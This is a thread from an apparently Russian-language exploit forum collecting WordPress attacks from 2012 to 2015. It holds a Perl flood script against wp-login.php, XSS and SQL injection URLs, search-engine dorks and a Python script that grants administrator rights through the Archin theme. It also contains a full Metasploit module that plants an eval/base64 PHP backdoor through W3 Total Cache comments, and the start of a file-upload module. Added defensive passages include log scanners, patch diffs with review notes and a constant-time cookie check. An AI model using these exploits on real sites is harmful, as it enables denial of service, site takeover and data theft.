Old 11.09.2012, 13:29   #31
::GraBBerZ.CoM::
Хулиган is offline
Join Date: 01.01.1970
Address: 127.0.0.1
Posts: 2,525
Respects: 2,670
Wordpress Login Page Denial of Service

Code:
#!/usr/bin/perl
#####################################
# Wordpress Login Page Denial of Service
# Code Written By Amir
# Www.IrIsT.Ir
# Greats : B3HZ4D - nimaarek - Mikili - Dead.Zone - C0dex - TaK.FaNaR - Nafsh
#####################################
use IO::Socket;

$host = $ARGV[0];
$path = $ARGV[1];

if(!$ARGV[1])
{
print "################################################# \n";
print "## Wordpress Login Page Denial of Service\n";
print "## Discoverd By Amir \n";
print "## Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## host.com /Wordpress\n";
print "################################################# \n";
exit();
}
for($i=0; $i<99999; $i++)
{
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
$post = "action=rp&key=1111111111111111111111111111111111111&login=True";
$pack.= "POST " .$path. "/wp-login.php HTTP/1.1\r\n";
$pack.= "Host: " .$host. "\r\n";
$pack.= "User-Agent: Googlebot/2.1\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Content-Length: " .length($post). "\r\n\r\n";
$pack.= $post;
print $socket $pack;
syswrite STDOUT, "+";
}

Old 18.09.2012, 23:00   #32
::GraBBerZ.CoM::
Хулиган is offline
Join Date: 01.01.1970
Address: 127.0.0.1
Posts: 2,525
Respects: 2,670
Wordpress - Multiple XSS Vulnerability

Code:
./Title Exploit : Wordpress - Multiple XSS Vulnerability
./CMS Version   : Wordpress v.3.4.2 (Last Version)
./WebApps URL   : http://www.wordpress.org/
./Author Exploit: [ TheCyberNuxbie ] [ root@31337sec.com ] [ nux_exploit ]
./Security Risk : [ High Level ]
./Category XPL  : [ WebApps/ZeroDay ]
./Tested On     : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID
./Time & Date   : September, 17 2012. 10:27 AM. Jakarta, Indonesia.
Code:
 |||                        -=[ Use It At Your Risk ]=-                        |||
 |||               This Was Written For Educational Purpos Only                |||
 |||               Author Will Be Not Responsible For Any Damage               |||

[ Information Content ]
[ Vulnerability Details ]
  • 1.1 Vulnerability XSS WP-Post.
  • 1.2 Vulnerability XSS WP-Page.
  • 1.3 Vulnerability XSS WP-MediaLibrary.

[ XSS CODE ]
Code:
<script>alert('31337');</script>
<script>alert(document.cookie);</script>
 <script>window.open("http://www.google.com/")</script>
[ Exploit Report ]
1.2. Create / Edit WP-Page:
1.3. Add / Edit WP-Media Library:
Script XSS will be Affected:
Respects for this post: 2

Old 02.10.2012, 05:10   #33
::GraBBerZ.CoM::
Хулиган is offline
Join Date: 01.01.1970
Address: 127.0.0.1
Posts: 2,525
Respects: 2,670
Code:
# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = "10.10.10.5"
#path to ajax.php
url = "/wordpress/wp-content/themes/archin/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()

ChangeOption(site, url, "admin_email", "fake@ballastsecurity.net")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
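Added example, not code from either post above: a small access-log scanner for the two request patterns those posts produce, the wp-login.php flood with a "Googlebot/2.1" User-Agent from post #31 and the unauthenticated POST to the Archin theme's option_panel/ajax.php from post #33. It reads Apache/nginx "combined" log lines; every log line below is constructed sample data, not real traffic, and the threshold and window values are assumptions to tune per site.

```python
"""Added example (not from the forum posts): flag the request patterns of
posts #31 and #33 in 'combined'-format web-server logs. Sample log lines
are constructed; threshold/window values are assumptions."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
ARCHIN_AJAX = "/hades_framework/option_panel/ajax.php"   # endpoint named in post #33


def _line(ip, ts, method, path, ua, status=200):
    """Build one constructed 'combined' log line."""
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"'


# Constructed sample log: 25 login POSTs within 25 s from one address, one
# ordinary login, one page view, and one hit on the Archin options endpoint.
SAMPLE_LOG = (
    [_line("203.0.113.7", f"11/Sep/2012:13:29:{i:02d} +0000", "POST",
           "/wordpress/wp-login.php", "Googlebot/2.1") for i in range(25)]
    + [_line("198.51.100.20", "11/Sep/2012:13:29:30 +0000", "POST",
             "/wordpress/wp-login.php", "Mozilla/5.0"),
       _line("198.51.100.20", "11/Sep/2012:13:29:31 +0000", "GET",
             "/wordpress/wp-admin/", "Mozilla/5.0"),
       _line("198.51.100.33", "02/Oct/2012:05:10:00 +0000", "POST",
             "/wordpress/wp-content/themes/archin" + ARCHIN_AJAX, "Python-urllib/2.7")]
)


def parse_line(line):
    """Return a dict for a well-formed line, None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["path"] = rec["path"].split("?", 1)[0]      # drop the query string
    return rec


def find_login_floods(lines, threshold=20, window_seconds=60):
    """Map IP -> peak count of POST /wp-login.php inside any window of
    `window_seconds`, for IPs whose peak reaches `threshold`."""
    times = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            times[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, ts in times.items():
        ts.sort()
        lo, peak = 0, 0
        for hi, t in enumerate(ts):            # sliding window over sorted times
            while (t - ts[lo]).total_seconds() > window_seconds:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def find_spoofed_bot_posts(lines):
    """Search-engine crawlers fetch pages; a self-declared Googlebot that POSTs
    is a script using the UA string as a disguise (the script above does exactly that)."""
    return [(r["ip"], r["path"]) for r in filter(None, map(parse_line, lines))
            if r["method"] == "POST" and r["ua"].startswith("Googlebot")]


def find_theme_option_writes(lines):
    """Every POST to the Archin option_panel/ajax.php endpoint: it saved options
    without any authentication, so each hit deserves a look."""
    return [(r["ip"], r["ts"].isoformat()) for r in filter(None, map(parse_line, lines))
            if r["method"] == "POST" and r["path"].endswith(ARCHIN_AJAX)]


if __name__ == "__main__":
    print("login floods:", find_login_floods(SAMPLE_LOG))
    print("spoofed-bot POSTs:", len(find_spoofed_bot_posts(SAMPLE_LOG)))
    print("theme option writes:", find_theme_option_writes(SAMPLE_LOG))
```

The flood detector keys on request rate per source address rather than on the `action=rp` body, because the body is not in a standard access log; the Archin check is path-based and does not depend on the response code, since the vulnerable endpoint answered 200 to anyone.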

Old 09.10.2012, 01:46   #34
::GraBBerZ.CoM::
Хулиган is offline
Join Date: 01.01.1970
Address: 127.0.0.1
Posts: 2,525
Respects: 2,670
Wordpress spider calendar Plugin Multiple Vulnerabilities

Code:
Dork: N/A
 
 Date: [02-10-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: @D4NB4R
 
 Vendor: http://wordpress.org/extend/plugins/spider-calendar/
 
 Version: 1.0.1
 
 License: Non-Commercial

 Demo: http://wpdemo.web-dorado.com/spider-calendar/

 Download: http://downloads.wordpress.org/plugin/spider-calendar.zip
  
 Tested on: [Linux(bt5)-Windows(7ultimate)]

 Especial greetz:  _84kur10_, nav, dedalo, ksha, shine, p0fk, the_s41nt
Quote:
WordPress plugin description:

Spider Calendar is a highly configurable plugin which allows you to have multiple organized events in a calendar. This plugin is one of the best WordPress Calendar available in WordPress Directory. If you have problem with organizing your events and displaying them in a calendar format, then Spider Calendar is the best solution. Maybe you just want to have a quick look at your calendar to remind yourself about the future appointments? It will be great if calendar extension will be able to show all events, display them in a widget as a beautiful and customizable calendar on your website. Spider WordPress Calendar is an extraordinary user friendly calendar.
Exploit:

XSS : Cross-site scripting

Code:
http://127.0.0.1/wp-content/plugins/Calendar/front_end/spidercalendarbig.php?calendar_id=1&cur_page_url=&date=D4NB4R'"()%26%251<ScRiPt >prompt()<%2fScRiPt>&day=01&ev_ids=1&eventID=1&theme_id=5
Code:
http://127.0.0.1/wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?theme_id=5&ev_ids=1&calendar_id=null union all select 1,1,1,1,0x3c7363726970743e616c657274282244344e42345220576173204865726522293c2f7363726970743e,1,1,1,1,1,1,1,1,1,1,1,1+--+&date=2012-10-10&many_sp_calendar=1&cur_page_url=http://127.0.0.1/spider-calendar/

SQL : SQL injection

Code:
http://127.0.0.1//wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?theme_id=5&ev_ids=1&calendar_id=null union all select 1,1,1,1,version(),1,1,1,1,1,1,1,1,1,1,1,1+--+&date=2012-10-10&many_sp_calendar=1&cur_page_url=

HPP : HTTP Parameter Pollution (HPP)

Code:
http://127.0.0.1/wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?calendar_id=1&ev_ids=1&theme_id=5%26D4NB4R%3dD4NB4R >> 127.0.0.1//wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?calendar_id=1&ev_ids=1&theme_id=5&d4nb4r=d4nb4r
source:bugsearch

Old 30.10.2012, 20:48   #35
::GraBBerZ.CoM::
Хулиган is offline
Join Date: 01.01.1970
Address: 127.0.0.1
Posts: 2,525
Respects: 2,670
Wordpress 3.4 Cross-Site Scripting Vulnerability

Code:
#############################
#
# Exploit Title : Wordpress 3.4 Cross-Site Scripting Vulnerability
#
# Author : IrIsT.Ir
#
# Discovered By : Am!r
#
# Home : http://IrIsT.Ir/forum/
#
# Software Link : http://wordpress.org
#
# Security Risk : High
#
# Version : All Version
#
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork : intext:"Powered By Wordpress"
#
#############################
#
# Expl0iTs :
#
# [Target]/wp-cron.php?doing_wp_cron=[Xss]
#
#
# C0de :
#
# $doing_wp_cron = $_GET[ 'doing_wp_cron' ];

#
#
#############################
Respects for this post: 2

Old 31.01.2013, 17:28   #36
::GraBBerZ.CoM::
Хулиган is offline
Join Date: 01.01.1970
Address: 127.0.0.1
Posts: 2,525
Respects: 2,670
Code:
##############
# Exploit Title : Wordpress RLSWordPressSearch plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : ww.ashiyane.org
#
# Security Risk : MEdium - SQL Injection
#
# Dork : inurl:wp-content/plugins/RLSWordPressSearch/register.php?a=
#
##############
#Location:site/wp-content/plugins/RLSWordPressSearch/register.php?a=[num]&agentid=[SQL]
#
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############
Users who gave Хулиган Respect for this post:

Old 01.05.2013, 21:57   #37
bit
un1k0 is offline
Join Date: 26.04.2013
Posts: 27
Respects: 5
Wordpress W3 Total Cache PHP Code Execution

Code:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress W3 Total Cache PHP Code Execution',
      'Description'    => %q{
          This module exploits a PHP Code Injection vulnerability against Wordpress plugin
        W3 Total Cache for versions up to and including 0.9.2.8.  WP Super Cache 1.2 or older
        is also reported as vulnerable.  The vulnerability is due to the handling of certain
        macros such as mfunc, which allows arbitrary PHP code injection.  A valid post ID is
        needed in order to add the malicious comment.  If the POSTID option isn't specified,
        then the module will automatically bruteforce one.  Also, if anonymous comments
        aren't allowed, then a valid username and password must be provided.  In addition,
        the "A comment is held for moderation" option on Wordpress must be unchecked for
        successful exploitation.  This module has been tested against Wordpress 3.5 and
        W3 Total Cache 0.9.2.3 on a Ubuntu 10.04 system.
      },
      'Author'  =>
        [
          'Unknown', # Vulnerability discovery
          'juan vazquez', # Metasploit module
          'hdm', # Metasploit module
          'Christian Mehlmauer' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '92652' ],
          [ 'BID', '59316' ],
          [ 'URL', 'http://wordpress.org/support/topic/pwn3d' ],
          [ 'URL', 'http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'DisableNops' => true,
        },
      'Targets'        => [ ['Wordpress 3.5', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 17 2013'
      ))
 
      register_options(
        [
          OptString.new('TARGETURI', [ true, "The base path to the wordpress application", "/wordpress/" ]),
          OptInt.new('POSTID', [ false, "The post ID where publish the comment" ]),
          OptString.new('USERNAME', [ false,  "The user to authenticate as (anonymous if username not provided)"]),
          OptString.new('PASSWORD', [ false,  "The password to authenticate with (anonymous if password not provided)" ])
        ], self.class)
  end
 
  def peer
    return "#{rhost}:#{rport}"
  end
 
  def require_auth?
    @user = datastore['USERNAME']
    @password = datastore['PASSWORD']
 
    if @user and @password and not @user.empty? and not @password.empty?
      return true
    else
      return false
    end
  end
 
  def get_session_cookie(header)
    header.split(";").each { |cookie|
      cookie.split(" ").each { |word|
        if word =~ /(.*logged_in.*)=(.*)/
          return $1, $2
        end
      }
    }
    return nil, nil
  end
 
  def login
    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path, "wp-login.php"),
        'method' => 'POST',
        'vars_post' => {
          'log' => @user,
          'pwd' => @password
        }
      })
 
    if res and res.code == 302 and res.headers['Set-Cookie']
      return get_session_cookie(res.headers['Set-Cookie'])
    else
      return nil, nil
    end
 
  end
 
  def check_post_id(uri)
    options = {
      'method' => 'GET',
      'uri'    => uri
    }
    options.merge!({'cookie' => "#{@cookie_name}=#{@cookie_value}"}) if @auth
    res = send_request_cgi(options)
    if res and res.code == 200 and res.body =~ /form.*action.*wp-comments-post.php/
      return true
    elsif res and (res.code == 301 or res.code == 302) and res.headers['Location']
      location = URI(res.headers["Location"])
      uri = location.path
      uri << "?#{location.query}" unless location.query.nil? or location.query.empty?
      return check_post_id(uri)
    end
    return false
  end
 
  def find_post_id
    (1..1000).each{|id|
      vprint_status("#{peer} - Checking POST ID #{id}...") if (id % 100) == 0
      res = check_post_id(normalize_uri(target_uri) + "/?p=#{id}")
      return id if res
    }
    return nil
  end
 
  def post_comment
    php_payload = "<!--mfunc if (sha1($_SERVER[HTTP_SUM]) == '#{@sum}' ) { eval(base64_decode($_SERVER[HTTP_CMD])); } --><!--/mfunc-->"
 
    vars_post = {
      'comment' => php_payload,
      'submit' => 'Post+Comment',
      'comment_post_ID' => "#{@post_id}",
      'comment_parent' => "0"
    }
    vars_post.merge!({
      'author' => rand_text_alpha(8),
      'email' => "#{rand_text_alpha(3)}@#{rand_text_alpha(3)}.com",
      'url' => rand_text_alpha(8),
    }) unless @auth
 
    options = {
      'uri' => normalize_uri(target_uri.path, "wp-comments-post.php"),
      'method' => 'POST'
    }
    options.merge!({'vars_post' => vars_post})
    options.merge!({'cookie' => "#{@cookie_name}=#{@cookie_value}"}) if @auth
 
    res = send_request_cgi(options)
    if res and res.code == 302
      location = URI(res.headers["Location"])
      uri = location.path
      uri << "?#{location.query}" unless location.query.nil? or location.query.empty?
      return uri
    else
      return nil
    end
  end
 
  def exploit
 
    @auth = require_auth?
 
    if @auth
      print_status("#{peer} - Trying to login...")
      @cookie_name, @cookie_value = login
      if @cookie_name.nil? or @cookie_value.nil?
        fail_with(Exploit::Failure::NoAccess, "#{peer} - Login wasn't successful")
      end
    else
      print_status("#{peer} - Trying unauthenticated exploitation...")
    end
 
    if datastore['POSTID'] and datastore['POSTID'] != 0
      @post_id = datastore['POSTID']
      print_status("#{peer} - Using the user supplied POST ID #{@post_id}...")
    else
      print_status("#{peer} - Trying to brute force a valid POST ID...")
      @post_id = find_post_id
      if @post_id.nil?
        fail_with(Exploit::Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment")
      else
        print_status("#{peer} - Using the brute forced POST ID #{@post_id}...")
      end
    end
 
    random_test = rand_text_alpha(64)
    @sum = Rex::Text.sha1(random_test)
 
    print_status("#{peer} - Injecting the PHP Code in a comment...")
    post_uri = post_comment
    if post_uri.nil?
      fail_with(Exploit::Failure::Unknown, "#{peer} - Expected redirection not returned")
    end
 
    print_status("#{peer} - Executing the payload...")
    options = {
      'method' => 'GET',
      'uri'    => post_uri,
      'headers' => {
        'Cmd' => Rex::Text.encode_base64(payload.encoded),
        'Sum' => random_test
      }
    }
    options.merge!({'cookie' => "#{@cookie_name}=#{@cookie_value}"}) if @auth
    res = send_request_cgi(options)
    if res and res.code == 301
      fail_with(Exploit::Failure::Unknown, "#{peer} - Unexpected redirection, maybe comments are moderated")
    end
  end
 
  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    })
 
    if res.nil?
      return Exploit::CheckCode::Unknown
    end
 
    if res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /W3 Total Cache\/([0-9\.]*)/
      # Compare as a version, not as a string: as strings "0.9.2.10" <= "0.9.2.8" is true.
      version = Gem::Version.correct?($1) ? Gem::Version.new($1) : nil
      if version && version <= Gem::Version.new("0.9.2.8")
        return Exploit::CheckCode::Vulnerable
      elsif version
        return Exploit::CheckCode::Safe
      end
    end
 
    if res.body and (res.body =~ /Performance optimized by W3 Total Cache/ or res.body =~ /Cached page generated by WP-Super-Cache/)
      return Exploit::CheckCode::Detected
    end
 
    return Exploit::CheckCode::Unknown
 
  end
end
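Added example, not part of the Metasploit module or of W3 Total Cache: two defensive checks that follow from the module's description and its check method. The first scans stored comment bodies for the cache plugins' dynamic-content macros (mfunc, mclude, dynamic-cached-content), which is how a plain comment gets PHP executed on an unpatched site; the second reads the plugin version from an X-Powered-By header and compares it component-wise as integers, because a string comparison gets "0.9.2.10" versus "0.9.2.8" wrong. The comment rows and headers are constructed test data; the cut-off version 0.9.2.8 is the one the module names.

```python
"""Added example (not from the Metasploit module): detect cache-plugin macros
in stored comments and compare a W3 Total Cache version numerically.
Comment rows and header strings are constructed test data."""
import re

# Comment-style macros the vulnerable cache plugins expanded into PHP.
MACRO_RE = re.compile(r"<!--\s*/?\s*(mfunc|mclude|dynamic-cached-content)\b", re.I)
W3TC_RE = re.compile(r"W3 Total Cache/([0-9.]+)")
LAST_VULNERABLE = (0, 9, 2, 8)          # "up to and including 0.9.2.8" per the module

# Constructed sample rows, shaped like wp_comments (comment_ID, author, content).
SAMPLE_COMMENTS = [
    {"id": 1, "author": "reader", "content": "Great post, thanks."},
    {"id": 2, "author": "x", "content": "nice <!--mfunc echo date('Y'); --><!--/mfunc--> article"},
    {"id": 3, "author": "dev", "content": "I disabled the mfunc macro in settings."},
    {"id": 4, "author": "y", "content": "<!-- MCLUDE footer-snippet.php --> hello"},
]


def parse_version(text):
    """'0.9.2.8' -> (0, 9, 2, 8); tolerates a trailing dot captured by the regex."""
    return tuple(int(p) for p in text.strip(".").split(".") if p)


def w3tc_version_vulnerable(x_powered_by):
    """True/False when the header names a W3 Total Cache version, None otherwise.
    Tuple comparison is numeric per component, unlike a string compare."""
    m = W3TC_RE.search(x_powered_by or "")
    if not m:
        return None
    return parse_version(m.group(1)) <= LAST_VULNERABLE


def scan_comments(rows):
    """Return [{'id', 'author', 'macro'}] for rows whose content carries a macro
    opener. Row 3 mentions 'mfunc' in prose and is not flagged: the regex needs
    the HTML comment opener the cache layer actually keys on."""
    hits = []
    for row in rows:
        m = MACRO_RE.search(row["content"])
        if m:
            hits.append({"id": row["id"], "author": row["author"],
                         "macro": m.group(1).lower()})
    return hits


if __name__ == "__main__":
    for hit in scan_comments(SAMPLE_COMMENTS):
        print(f"comment {hit['id']} by {hit['author']}: {hit['macro']} macro present")
    for hdr in ("W3 Total Cache/0.9.2.8", "W3 Total Cache/0.9.2.10", "PHP/5.3"):
        print(hdr, "->", w3tc_version_vulnerable(hdr))
```

Run the comment scan over a dump of wp_comments after upgrading the plugin: the upgrade stops new macros from executing, but any macro already stored keeps sitting in the database until it is removed.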

Old 02.08.2014, 00:45   #38
bit
apps is offline
Join Date: 18.03.2011
Posts: 40
Respects: 15
CVE-2014-0165
WordPress before 3.7.2 and 3.8.x before 3.8.2 allows remote authenticated users to publish posts by leveraging the Contributor role, related to wp-admin/includes/post.php and wp-admin/includes/class-wp-posts-list-table.php.

Vulnerable code
Quote:
3.8/wp-admin/includes/class-wp-posts-list-table.php

Code:
endif; // post_type_supports author 

 if ( !$bulk ) : 
 if ( !$bulk && $can_publish ) :
    ?>
branches/3.8/src/wp-admin/includes/post.php
Code:
Index: branches/3.8/src/wp-admin/includes/post.php
===================================================================
--- a/branches/3.8/src/wp-admin/includes/post.php
+++ b/branches/3.8/src/wp-admin/includes/post.php
@@ -101,4 +101,8 @@
     $previous_status = $post_id ? get_post_field( 'post_status', $post_id ) : false;
 
+    if ( isset( $post_data['post_status'] ) && 'private' == $post_data['post_status'] && ! current_user_can( $ptype->cap->publish_posts ) ) {
+        $post_data['post_status'] = $previous_status ? $previous_status : 'pending';
+    }
+
     $published_statuses = array( 'publish', 'future' );
 
@@ -111,4 +115,8 @@
     if ( ! isset($post_data['post_status']) )
         $post_data['post_status'] = $previous_status;
+
+    if ( isset( $post_data['post_password'] ) && ! current_user_can( $ptype->cap->publish_posts ) ) {
+        unset( $post_data['post_password'] );
+    }
 
     if (!isset( $post_data['comment_status'] ))
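Review bot: the new `post_password` guard has no comment saying why non-publishers lose the field; a password-protected post is a published post that anyone holding the password can read, so gating it on `publish_posts` is the point of the hunk, and a one-liner above the `if`, such as `// Only users who can publish may password-protect a post.`, would keep the next reader from "simplifying" it away.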
@@ -171,4 +179,12 @@
     $post_data['post_mime_type'] = $post->post_mime_type;
 
+    if ( ! empty( $post_data['post_status'] ) ) {
+        $post_data['post_status'] = sanitize_key( $post_data['post_status'] );
+
+        if ( 'inherit' == $post_data['post_status'] ) {
+            unset( $post_data['post_status'] );
+        }
+    }
+
     $ptype = get_post_type_object($post_data['post_type']);
     if ( !current_user_can( 'edit_post', $post_ID ) ) {
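Review bot: `sanitize_key()` lowercases and strips everything outside `[a-z0-9_-]`, so an unexpected status such as `Publish` is silently normalised to `publish` rather than rejected; consider additionally checking the result against `get_post_stati()` so an unknown status is dropped instead of passed on to the capability checks. The special-casing of `inherit` is right, since that status belongs to attachments and revisions and is never a valid user-supplied value.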
@@ -188,7 +204,4 @@
     }
 
-    $post_data = _wp_translate_postdata( true, $post_data );
-    if ( is_wp_error($post_data) )
-        wp_die( $post_data->get_error_message() );
     if ( ( empty( $post_data['action'] ) || 'autosave' != $post_data['action'] ) && 'auto-draft' == $post_data['post_status'] ) {
         $post_data['post_status'] = 'draft';
@@ -211,4 +224,8 @@
     }
 
+    $post_data = _wp_translate_postdata( true, $post_data );
+    if ( is_wp_error($post_data) )
+        wp_die( $post_data->get_error_message() );
+
     // Post Formats
     if ( isset( $post_data['post_format'] ) )
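Review bot: this hunk and the one before it move `_wp_translate_postdata( true, $post_data )` to after the `auto-draft` to `draft` normalisation, so the translation (where the `post_status` and `post_password` guards added earlier in this patch live) now sees the normalised status; the ordering is deliberate but nothing in the code says so, and a comment above the moved call would stop a future clean-up from hoisting it back.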
@@ -332,4 +349,12 @@
     }
     unset($post_data['_status']);
+
+    if ( ! empty( $post_data['post_status'] ) ) {
+        $post_data['post_status'] = sanitize_key( $post_data['post_status'] );
+
+        if ( 'inherit' == $post_data['post_status'] ) {
+            unset( $post_data['post_status'] );
+        }
+    }
 
     $post_IDs = array_map( 'intval', (array) $post_data['post'] );
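Review bot: this `sanitize_key` / `inherit` block is a verbatim copy of the one added in the single-post path above; extract it into a small helper (something like `_wp_sanitize_post_status( $status )`, name hypothetical) so the two entry points cannot drift apart the next time the status rules change.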
@@ -423,8 +448,23 @@
         }
 
+        $post_data['post_type'] = $post->post_type;
         $post_data['post_mime_type'] = $post->post_mime_type;
         $post_data['guid'] = $post->guid;
 
+        foreach ( array( 'comment_status', 'ping_status', 'post_author' ) as $field ) {
+            if ( ! isset( $post_data[ $field ] ) ) {
+                $post_data[ $field ] = $post->$field;
+            }
+        }
+
         $post_data['ID'] = $post_ID;
+        $post_data['post_ID'] = $post_ID;
+
+        $post_data = _wp_translate_postdata( true, $post_data );
+        if ( is_wp_error( $post_data ) ) {
+            $skipped[] = $post_ID;
+            continue;
+        }
+
         $updated[] = wp_update_post( $post_data );
 
@@ -570,8 +610,4 @@
         return edit_post();
 
-    $translated = _wp_translate_postdata( false );
-    if ( is_wp_error($translated) )
-        return $translated;
-
     if ( isset($_POST['visibility']) ) {
         switch ( $_POST['visibility'] ) {
@@ -589,4 +625,8 @@
         }
     }
+
+    $translated = _wp_translate_postdata( false );
+    if ( is_wp_error($translated) )
+        return $translated;
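Review bot: with `_wp_translate_postdata( false )` moved below the visibility `switch`, the capability checks inside the translation now act on the status chosen by the visibility handling instead of the raw `$_POST` value, which is what closes the Contributor publish path; as with the other relocation in this patch, leave a comment that the call must stay after the `switch`.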
Added 7 minutes later

CVE-2014-0166
The wp_validate_auth_cookie function in wp-includes/pluggable.php in WordPress before 3.7.2 and 3.8.x before 3.8.2 does not properly determine the validity of authentication cookies, which makes it easier for remote attackers to obtain access via a forged cookie.

Quote:
Index: branches/3.8/src/wp-includes/pluggable.php
===================================================================
Code:
--- a/branches/3.8/src/wp-includes/pluggable.php
+++ b/branches/3.8/src/wp-includes/pluggable.php
@@ -544,5 +544,5 @@
     $hash = hash_hmac('md5', $username . '|' . $expiration, $key);
 
-    if ( $hmac != $hash ) {
+    if ( hash_hmac( 'md5', $hmac, $key ) !== hash_hmac( 'md5', $hash, $key ) ) {
         do_action('auth_cookie_bad_hash', $cookie_elements);
         return false;
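Review bot: the replacement comparison fixes two separate problems and the surrounding comment should name both: `!=` is PHP's loose comparison, under which two hex digests that both look like `0e...` compare equal as numbers, and a plain string compare stops at the first differing byte, so its running time depended on how much of the forged HMAC was right; re-keying both values through `hash_hmac` and comparing with `!==` gives a strict, length-independent comparison. On PHP 5.6 or later the same effect reads more clearly as `! hash_equals( $hash, $hmac )`.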
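Added example, not WordPress code: the authentication-cookie check that the CVE-2014-0166 patch above hardens, rewritten in Python. The `username|expiration|hmac` layout and the keyed MD5 HMAC over `username|expiration` follow the patched pluggable.php hunk; the secret key, the function names and the clock value are assumptions. Python's `hmac.compare_digest` stands in for the patch's trick of re-HMACing both sides and comparing with `!==`: both give a comparison whose result, and whose running time, do not depend on where the first mismatching byte sits.

```python
"""Added example (not from WordPress): constant-time validation of a
username|expiration|hmac cookie, the shape fixed by CVE-2014-0166.
Key, names and clock values are assumptions."""
import hashlib
import hmac

DEMO_KEY = b"constructed-demo-key, not a real secret"   # assumption, for the tests only


def make_auth_cookie(username, expiration, key=DEMO_KEY):
    """Build the cookie the way the server would: HMAC-MD5 over 'user|exp'."""
    msg = f"{username}|{expiration}".encode()
    mac = hmac.new(key, msg, hashlib.md5).hexdigest()
    return f"{username}|{expiration}|{mac}"


def validate_auth_cookie(cookie, now, key=DEMO_KEY):
    """Return the username for a well-formed, unexpired cookie with a valid HMAC,
    otherwise None. Every failure returns the same value, so the caller cannot
    tell 'bad format' from 'bad HMAC'."""
    parts = cookie.split("|")
    if len(parts) != 3:
        return None
    username, expiration, presented = parts
    if not expiration.isdigit() or int(expiration) < now:
        return None
    expected = hmac.new(key, f"{username}|{expiration}".encode(), hashlib.md5).hexdigest()
    # Constant-time comparison; a plain == / != stops at the first differing byte,
    # which is the timing side channel the pluggable.php patch removes.
    if not hmac.compare_digest(expected, presented):
        return None
    return username


if __name__ == "__main__":
    good = make_auth_cookie("alice", 1700000000)
    print(validate_auth_cookie(good, now=1600000000))                       # alice
    print(validate_auth_cookie(good.replace("alice", "admin", 1), now=1600000000))  # None
    print(validate_auth_cookie(good, now=1700000001))                       # None (expired)
```

Two details matter beyond the comparison itself: the expiry check happens before the HMAC check, so an expired cookie fails even when its MAC is intact, and the username is taken from the verified cookie rather than from any other request field, so it cannot be swapped after verification.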

Old 11.11.2015, 10:01   #39
::GraBBerZ.CoM::
Хулиган is offline
Join Date: 01.01.1970
Address: 127.0.0.1
Posts: 2,525
Respects: 2,670
Wordpress Ajax Load More PHP Upload Vulnerability

Code:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress Ajax Load More PHP Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary file upload in the WordPress Ajax Load More
        version 2.8.1.1. It allows to upload arbitrary php files and get remote code
        execution. This module has been tested successfully on WordPress Ajax Load More
